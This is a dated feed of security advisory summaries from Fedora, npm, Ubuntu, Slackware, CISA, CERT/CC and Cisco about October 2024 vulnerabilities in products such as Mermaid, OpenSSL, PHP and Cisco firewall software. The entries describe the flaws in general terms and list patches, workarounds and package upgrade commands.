23.10.2024 04:34:17fedora[FEDORA-2024-1949806a59] Fedora 40: wireshark (high)New version 4.2.8Fix for CVE-2024-9781https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1949806a59
22.10.2024 21:17:03npm[NPM:GHSA-M4GQ-X24J-JPMF] Mermaid allows prototype pollution in bundled version of DOMPurify (high)The following bundled files within the Mermaid NPM package contain a bundled version of DOMPurify that is vulnerable to https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674, potentially resulting in an XSS attack.This affects the built:- `dist/mermaid.min.js`- `dist/mermaid.js`- `dist/mermaid.esm.mjs`- `dist/mermaid.esm.min.mjs`This will also affect users that use the above files via a CDN link, e.g. `https://cdn.jsdelivr.net/npm/mermaid@10.9.2/dist/mermaid.min.js`**Users that use the default NPM export of `mermaid`, e.g. `import mermaid from 'mermaid'`, or the `dist/mermaid.core.mjs` file, do not use this bundled version of DOMPurify, and can easily update using their package manager with something like `npm audit fix`.**### Patches- `develop` branch: 6c785c93166c151d27d328ddf68a13d9d65adc00- backport to v10: 92a07ffe40aab2769dd1c3431b4eb5beac282b34https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-M4GQ-X24J-JPMF
22.10.2024 22:22:20npm[NPM:GHSA-C5G6-6XF7-QXP3] Umbraco CMS vulnerable to stored Cross-site Scripting in the "dictionary name" on Dictionary section (moderate)### ImpactThis can be leveraged to gain access to higher-privilege endpoints, e.g. if you get a user with admin privileges to run the code, you can potentially elevate all users and grant them admin privileges or access protected content.### PatchesWill be patched in 14.3.1 and 15.0.0.### WorkaroundsEnsure that access to the Dictionary section is only granted to trusted users.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-C5G6-6XF7-QXP3
22.10.2024 16:09:25ubuntu[USN-7080-1] Unbound vulnerability (medium)Unbound could be made to stop responding if it received specially crafted DNS traffic.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7080-1
22.10.2024 14:42:16ubuntu[USN-7079-1] WebKitGTK vulnerabilities (medium)Several security issues were fixed in WebKitGTK.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7079-1
22.10.2024 07:28:33ubuntu[USN-7078-1] Firefox vulnerabilityFirefox could be made to crash or run programs as your loginhttps://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7078-1
22.10.2024 03:00:00cisa[CISA-2024:1022] CISA Adds One Known Exploited Vulnerability to Catalog (high)CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:1022
22.10.2024 00:31:34slackware[SSA:2024-295-01] opensslNew openssl packages are available for Slackware 15.0 to fix a security issue.**Here are the details from the Slackware 15.0 ChangeLog**```patches/packages/openssl-1.1.1zb-i586-1_slack15.0.txz: Upgraded. Apply patch to fix a security issue: Harden BN_GF2m_poly2arr against misuse. This CVE was fixed by the 1.1.1zb release that is only available to subscribers to OpenSSL's premium extended support. The patch was prepared by backporting from the OpenSSL-3.0 repo. The reported version number has been updated so that vulnerability scanners calm down. Thanks to Ken Zalewski for the patch! For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-9143 (* Security fix *)patches/packages/openssl-solibs-1.1.1zb-i586-1_slack15.0.txz: Upgraded.```**Where to find the new packages**Thanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/openssl-1.1.1zb-i586-1_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/openssl-solibs-1.1.1zb-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/openssl-1.1.1zb-x86_64-1_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/openssl-solibs-1.1.1zb-x86_64-1_slack15.0.txz**MD5 signatures**Slackware 15.0 package:bc3ff191e19ec27b384056420cb2109c openssl-1.1.1zb-i586-1_slack15.0.txzc8465e76a2801dbae13c4e519b4ad91b openssl-solibs-1.1.1zb-i586-1_slack15.0.txzSlackware x86_64 15.0 package:4e693fe5a69f57968c829c59f8b89c6b openssl-1.1.1zb-x86_64-1_slack15.0.txzff52911f9a5dafd4efc46afcbddb3831 openssl-solibs-1.1.1zb-x86_64-1_slack15.0.txz**Installation instructions**Upgrade the package as root:`# upgradepkg openssl-1.1.1zb-i586-1_slack15.0.txz openssl-solibs-1.1.1zb-i586-1_slack15.0.txz`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-295-01
22.10.2024 22:47:42npm[NPM:GHSA-C7QV-Q95Q-8V27] Denial of service in http-proxy-middleware (high)Versions of the package http-proxy-middleware before 2.0.7, from 3.0.0 and before 3.0.3 are vulnerable to Denial of Service (DoS) due to an UnhandledPromiseRejection error thrown by micromatch. An attacker could kill the Node.js process and crash the server by making requests to certain paths.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-C7QV-Q95Q-8V27
24.10.2024 04:28:49fedora[FEDORA-2024-f1615b58e6] Fedora 40: python-openapi-core, python-platformio, python-fastapi, python-starlette (none)Security fix for CVE-2024-47874.Starlette 0.40.0 (October 15, 2024)This release fixes a Denial of service (DoS) via multipart/form-data requests.You can view the full security advisory:GHSA-f96h-pmfr-66vwFixedAdd max_part_size to MultiPartParser to limit the size of parts in multipart/form-data requests fd038f3.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f1615b58e6
24.10.2024 04:28:43fedora[FEDORA-2024-87d8204201] Fedora 40: dotnet6.0This is the October 2024 monthly update for .NET 6.Release Notes:SDK: https://github.com/dotnet/core/blob/main/release-notes/6.0/6.0.35/6.0.135.mdRuntime: https://github.com/dotnet/core/blob/main/release-notes/6.0/6.0.35/6.0.35.mdhttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-87d8204201
24.10.2024 04:28:42fedora[FEDORA-2024-23292e9f6d] Fedora 40: rust-pyo3-build-config, rust-pyo3-macros, rust-pyo3-macros-backend, rust-pyo3, rust-pyo3-ffiUpdate pyo3 to version 0.22.4.This version addresses a potential use-after-free RUSTSEC-2024-0378.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-23292e9f6d
24.10.2024 04:28:42fedora[FEDORA-2024-66b0bdad35] Fedora 40: yarnpkg (critical)Update bundled ws (CVE-2024-37890)Update bundled elliptic to fix CVE-2024-48949.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-66b0bdad35
24.10.2024 04:20:52fedora[FEDORA-2024-00855b1d76] Fedora 39: dotnet6.0This is the October 2024 monthly update for .NET 6.Release Notes:SDK: https://github.com/dotnet/core/blob/main/release-notes/6.0/6.0.35/6.0.135.mdRuntime: https://github.com/dotnet/core/blob/main/release-notes/6.0/6.0.35/6.0.35.mdhttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-00855b1d76
24.10.2024 04:20:51fedora[FEDORA-2024-d79685d847] Fedora 39: yarnpkg (critical)Update bundled ws (CVE-2024-37890)Update bundled dependencies to fix CVE-2024-48949.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-d79685d847
24.10.2024 04:20:50fedora[FEDORA-2024-44f01d9c69] Fedora 39: rust-pyo3, rust-pyo3-build-config, rust-pyo3-macros, rust-pyo3-ffi, rust-pyo3-macros-backendUpdate pyo3 to version 0.22.4.This version addresses a potential use-after-free RUSTSEC-2024-0378.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-44f01d9c69
24.10.2024 04:20:46fedora[FEDORA-2024-ef4911442d] Fedora 39: kojiUpdate to 1.35.1. Includes fix for CVE-2024-9427https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ef4911442d
24.10.2024 00:41:02npm[NPM:GHSA-QQQW-GM93-QF6M] OS Command Injection in Snyk gradle plugin (high)The Snyk gradle plugin is vulnerable to Code Injection when scanning an untrusted Gradle project. The vulnerability can be triggered if Snyk test is run inside the untrusted project due to the improper handling of the current working directory name. Snyk recommends only scanning trusted projects.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QQQW-GM93-QF6M
24.10.2024 00:40:15npm[NPM:GHSA-69F9-H8F9-7VJF] OS Command Injection in Snyk php plugin (high)The Snyk php plugin is vulnerable to Code Injection when scanning an untrusted PHP project. The vulnerability can be triggered if Snyk test is run inside the untrusted project due to the improper handling of the current working directory name. Snyk recommends only scanning trusted projects.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-69F9-H8F9-7VJF
23.10.2024 22:42:15slackware[SSA:2024-297-01] php81 (critical)New php81 packages are available for Slackware 15.0 to fix security issues.**Here are the details from the Slackware 15.0 ChangeLog**```extra/php81/php81-8.1.30-i586-1_slack15.0.txz: Upgraded. This update fixes bugs and security issues: Bypass of CVE-2024-4577, Parameter Injection Vulnerability. cgi.force_redirect configuration is bypassable due to the environment variable collision. Logs from childrens may be altered. Erroneous parsing of multipart form data. For more information, see: https://www.php.net/ChangeLog-8.php#8.1.30 https://www.cve.org/CVERecord?id=CVE-2024-8926 https://www.cve.org/CVERecord?id=CVE-2024-8927 https://www.cve.org/CVERecord?id=CVE-2024-9026 https://www.cve.org/CVERecord?id=CVE-2024-8925 (* Security fix *)```**Where to find the new packages**Thanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.Updated packages for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/extra/php81/php81-8.1.30-i586-1_slack15.0.txzUpdated packages for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/extra/php81/php81-8.1.30-x86_64-1_slack15.0.txz**MD5 signatures**Slackware 15.0 packages:f5f02a4d41face4db9f0aa8e2a09c436 php81-8.1.30-i586-1_slack15.0.txzSlackware x86_64 15.0 packages:7487a753cfebb64142474e278c703908 php81-8.1.30-x86_64-1_slack15.0.txz**Installation instructions**Upgrade the package as root:`# upgradepkg php81-8.1.30-i586-1_slack15.0.txz`Then, restart Apache httpd:`# /etc/rc.d/rc.httpd stop``# /etc/rc.d/rc.httpd start`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-297-01
23.10.2024 20:28:33cert[VU:123336] Vulnerable WiFi Alliance example code found in Arcadyan FMIMG51AX000J

### Overview

A command injection vulnerability has been identified in the Wi-Fi Test Suite, a tool developed by the WiFi Alliance, which has been found deployed on Arcadyan routers. This flaw allows an unauthenticated local attacker to exploit the Wi-Fi Test Suite by sending specially crafted packets, enabling the execution of arbitrary commands with root privileges on the affected routers.

### Description

The Wi-Fi Test Suite, as described by its developer, was originally created by the Wi-Fi Alliance—a global non-profit industry association responsible for Wi-Fi standards—to support the development of certification programs and device certification. This software was not designed for use in production environments. However, it has been discovered in commercial router deployments, exposing a vulnerability in the test code in production. The Wi-Fi Test Suite contains vulnerable code that is susceptible to command injection attacks. An attacker can exploit this vulnerability by sending specially crafted packets to a device running the Wi-Fi Test Suite, allowing them to execute commands with administrative (root) privileges.

**CVE-2024-41992**

It is possible for an unauthenticated local attacker to use specially crafted packets to execute commands as root.

### Impact

An attacker who successfully exploits this vulnerability can gain full administrative control over the affected device. With this access, the attacker can modify system settings, disrupt critical network services, or reset the device entirely. These actions can result in service interruptions, compromise of network data, and potential loss of service for all users dependent on the affected network.

### Solution

The CERT/CC recommends that vendors who have included the Wi-Fi Test Suite update it to version >=9.0 or remove it entirely from production devices to reduce the risk of exploitation.

### Acknowledgements

Thanks to the reporter Noam Rathaus from SSD Disclosure. This document was written by Timur Snoke.

https://secdb.nttzen.cloud/security-advisory/cert/VU:123336
23.10.2024 19:00:00cisco[CISCO-SA-SNORT-RF-BYPASS-OY8F3PNM] Multiple Cisco Products Snort Rate Filter Bypass Vulnerability (medium)Multiple Cisco products are affected by a vulnerability in the rate filtering feature of the Snort detection engine that could allow an unauthenticated, remote attacker to bypass a configured rate limiting filter.This vulnerability is due to an incorrect connection count comparison. An attacker could exploit this vulnerability by sending traffic through an affected device at a rate that exceeds a configured rate filter. A successful exploit could allow the attacker to successfully bypass the rate filter. This could allow unintended traffic to enter the network protected by the affected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SNORT-RF-BYPASS-OY8F3PNM
23.10.2024 19:00:00cisco[CISCO-SA-SNORT-BYPASS-PTRY37FX] Cisco Firepower Threat Defense Software TCP Snort 3 Detection Engine Bypass Vulnerability (medium)A vulnerability in the interaction between the TCP Intercept feature and the Snort 3 detection engine on Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass configured policies on an affected system. Devices that are configured with Snort 2 are not affected by this vulnerability.This vulnerability is due to a logic error when handling embryonic (half-open) TCP connections. An attacker could exploit this vulnerability by sending a crafted traffic pattern through an affected device. A successful exploit could allow unintended traffic to enter the network protected by the affected device.Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SNORT-BYPASS-PTRY37FX
23.10.2024 19:00:00cisco[CISCO-SA-SA-FTD-SNORT-FW-BCJTZPMU] Cisco Firepower Threat Defense Software and Cisco FirePOWER Services TCP/IP Traffic with Snort 2 and Snort 3 Denial of Service Vulnerability (high)A vulnerability in the TCP/IP traffic handling function of the Snort Detection Engine of Cisco Firepower Threat Defense (FTD) Software and Cisco FirePOWER Services could allow an unauthenticated, remote attacker to cause legitimate network traffic to be dropped, resulting in a denial of service (DoS) condition.This vulnerability is due to the improper handling of TCP/IP network traffic. An attacker could exploit this vulnerability by sending a large amount of TCP/IP network traffic through the affected device. A successful exploit could allow the attacker to cause the Cisco FTD device to drop network traffic, resulting in a DoS condition. The affected device must be rebooted to resolve the DoS condition.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SA-FTD-SNORT-FW-BCJTZPMU
23.10.2024 19:00:00cisco[CISCO-SA-FTD2100-SNORT-DOS-M9HUMT75] Cisco Firepower Threat Defense Software for Cisco Firepower 2100 Series Appliances TCP UDP Snort 2 and Snort 3 Denial of Service Vulnerability (high)A vulnerability in the Snort 2 and Snort 3 TCP and UDP detection engine of Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 2100 Series Appliances could allow an unauthenticated, remote attacker to cause memory corruption, which could cause the Snort detection engine to restart unexpectedly.This vulnerability is due to improper memory management when the Snort detection engine processes specific TCP or UDP packets. An attacker could exploit this vulnerability by sending crafted TCP or UDP packets through a device that is inspecting traffic using the Snort detection engine. A successful exploit could allow the attacker to restart the Snort detection engine repeatedly, which could cause a denial of service (DoS) condition. The DoS condition impacts only the traffic through the device that is examined by the Snort detection engine. The device can still be managed over the network.Note: Once a memory block is corrupted, it cannot be cleared until the Cisco Firepower 2100 Series Appliance is manually reloaded. This means that the Snort detection engine could crash repeatedly, causing traffic that is processed by the Snort detection engine to be dropped until the device is manually reloaded.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FTD2100-SNORT-DOS-M9HUMT75
23.10.2024 19:00:00cisco[CISCO-SA-FTD-TLS-DOS-QXYE5UFY] Cisco Firepower Threat Defense Software for Firepower 2100 Series TLS Denial of Service Vulnerability (high)A vulnerability in the TLS processing feature of Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 2100 Series could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.This vulnerability is due to an issue that occurs when TLS traffic is processed. An attacker could exploit this vulnerability by sending certain TLS traffic over IPv4 through an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition and impacting traffic to and through the affected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FTD-TLS-DOS-QXYE5UFY
23.10.2024 19:00:00cisco[CISCO-SA-FTD-STATCRED-DFC8TXT5] Cisco Firepower Threat Defense Software for Firepower 1000, 2100, 3100, and 4200 Series Static Credential Vulnerability (critical)A vulnerability in Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 1000, 2100, 3100, and 4200 Series could allow an unauthenticated, local attacker to access an affected system using static credentials.This vulnerability is due to the presence of static accounts with hard-coded passwords on an affected system. An attacker could exploit this vulnerability by logging in to the CLI of an affected device with these credentials. A successful exploit could allow the attacker to access the affected system and retrieve sensitive information, perform limited troubleshooting actions, modify some configuration options, or render the device unable to boot to the operating system, requiring a reimage of the device.Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FTD-STATCRED-DFC8TXT5
23.10.2024 19:00:00cisco[CISCO-SA-FTD-GEOIP-BYPASS-MB4ZRDU] Cisco Firepower Threat Defense Software Geolocation ACL Bypass Vulnerability (medium)A vulnerability in the geolocation access control feature of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass an access control policy.This vulnerability is due to improper assignment of geolocation data. An attacker could exploit this vulnerability by sending traffic through an affected device. A successful exploit could allow the attacker to bypass a geolocation-based access control policy and successfully send traffic to a protected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FTD-GEOIP-BYPASS-MB4ZRDU
23.10.2024 19:00:00cisco[CISCO-SA-FMC-XSS-INFODISC-RL4MJFER] Cisco Secure Firewall Management Center Software Cross-Site Scripting and Information Disclosure Vulnerabilities (medium)Multiple vulnerabilities in Cisco Secure Firewall Management Center (FMC) Software, formerly Firepower Management Center Software, could allow an attacker to conduct cross-site scripting (XSS) attacks or access unauthorized information on an affected device.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-XSS-INFODISC-RL4MJFER
23.10.2024 19:00:00cisco[CISCO-SA-FMC-XSS-DHJXQYZS] Cisco Secure Firewall Management Center Software Cross-Site Scripting Vulnerabilities (medium)Multiple vulnerabilities in the web-based management interface of Cisco Secure Firewall Management Center (FMC) Software, formerly Firepower Management Center Software, could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface of an affected device.These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by inserting crafted input into various data fields in an affected interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-XSS-DHJXQYZS
23.10.2024 19:00:00cisco[CISCO-SA-FMC-SQL-INJECT-2ENMTC8V] Cisco Secure Firewall Management Center Software SQL Injection Vulnerability (medium)A vulnerability in the web-based management interface of Cisco Secure Firewall Management Center (FMC) Software, formerly Firepower Management Center Software, could allow an authenticated, remote attacker to perform an SQL injection attack against an affected device. To exploit this vulnerability, an attacker must have a valid account on the device with the role of Security Approver, Intrusion Admin, Access Admin, or Network Admin.This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to read the contents of databases on the affected device and also obtain limited read access to the underlying operating system.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-SQL-INJECT-2ENMTC8V
23.10.2024 19:00:00cisco[CISCO-SA-FMC-SQL-INJ-LOYAFCFQ] Cisco Secure Firewall Management Center Software SQL Injection Vulnerabilities (medium)Multiple vulnerabilities in the web-based management interface of Cisco Secure Firewall Management Center (FMC) Software, formerly Firepower Management Center Software, could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system.These vulnerabilities exist because the web-based management interface does not validate user input adequately. An attacker could exploit these vulnerabilities by authenticating to the application as an Administrator and sending crafted SQL queries to an affected system. A successful exploit could allow the attacker to obtain unauthorized data from the database and make changes to the system. To exploit these vulnerabilities, an attacker would need Administrator-level privileges.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-SQL-INJ-LOYAFCFQ
23.10.2024 19:00:00cisco[CISCO-SA-FMC-PRIV-ESC-CMQ4S6M7] Cisco Secure Firewall Management Center Privilege Escalation Vulnerability (medium)A vulnerability in the web-based management interface of Cisco Secure Firewall Management Center (FMC) Software, formerly Firepower Management Center Software, could allow an authenticated, remote attacker to elevate privileges on an affected device. To exploit this vulnerability, an attacker must have a valid account on the device that is configured with a custom read-only role.This vulnerability is due to insufficient validation of role permissions in part of the web-based management interface. An attacker could exploit this vulnerability by performing a write operation on the affected part of the web-based management interface. A successful exploit could allow the attacker to modify certain parts of the configuration.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-PRIV-ESC-CMQ4S6M7
23.10.2024 19:00:00cisco[CISCO-SA-FMC-HTML-INJ-NFJEYHXZ] Cisco Secure Firewall Management Center Software HTML Injection Vulnerability (medium)A vulnerability in the web-based management interface of Cisco Secure Firewall Management Center (FMC) Software, formerly Firepower Management Center Software, could allow an authenticated, remote attacker to inject arbitrary HTML content into a device-generated document.This vulnerability is due to improper validation of user-supplied data. An attacker could exploit this vulnerability by submitting malicious content to an affected device and using the device to generate a document that contains sensitive information. A successful exploit could allow the attacker to alter the standard layout of the device-generated documents, access arbitrary files from the underlying operating system, and conduct server-side request forgery (SSRF) attacks. To successfully exploit this vulnerability, an attacker would need valid credentials for a user account with policy-editing permissions, such as Network Admin, Intrusion Admin, or any custom user role with the same capabilities.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-HTML-INJ-NFJEYHXZ
23.10.2024 19:00:00cisco[CISCO-SA-FMC-FILE-READ-5Q4MQRN] Cisco Secure Firewall Management Center Software Arbitrary File Read Vulnerability (medium)A vulnerability in the web-based management interface of Cisco Secure Firewall Management Center (FMC) Software, formerly Firepower Management Center Software, could allow an authenticated, remote attacker to read arbitrary files from the underlying operating system.This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to read arbitrary files on the underlying operating system of the affected device. The attacker would need valid user credentials to exploit this vulnerability.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-FILE-READ-5Q4MQRN
23.10.2024 19:00:00cisco[CISCO-SA-FMC-CMD-INJ-V3AWDQN7] Cisco Secure Firewall Management Center Software Command Injection Vulnerability (critical)A vulnerability in the web-based management interface of Cisco Secure Firewall Management Center (FMC) Software, formerly Firepower Management Center Software, could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system as root.This vulnerability is due to insufficient input validation of certain HTTP requests. An attacker could exploit this vulnerability by authenticating to the web-based management interface of an affected device and then sending a crafted HTTP request to the device. A successful exploit could allow the attacker to execute arbitrary commands with root permissions on the underlying operating system of the Cisco FMC device or to execute commands on managed Cisco Firepower Threat Defense (FTD) devices. To exploit this vulnerability, the attacker would need valid credentials for a user account with at least the role of Security Analyst (Read Only).Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-CMD-INJ-V3AWDQN7
23.10.2024 19:00:00cisco[CISCO-SA-FMC-CMD-INJ-G8AOKNDP] Cisco Secure Firewall Management Center Software Cluster Backup Command Injection Vulnerability (medium)A vulnerability in the cluster backup feature of Cisco Secure Firewall Management Center (FMC) Software, formerly Firepower Management Center Software, could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system.This vulnerability is due to insufficient validation of user data that is supplied through the web-based management interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to execute arbitrary operating system commands on the affected device. To exploit this vulnerability, an attacker would need valid credentials for a user account with at least the role of Network Administrator. In addition, the attacker would need to persuade a legitimate user to initiate a cluster backup on the affected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication 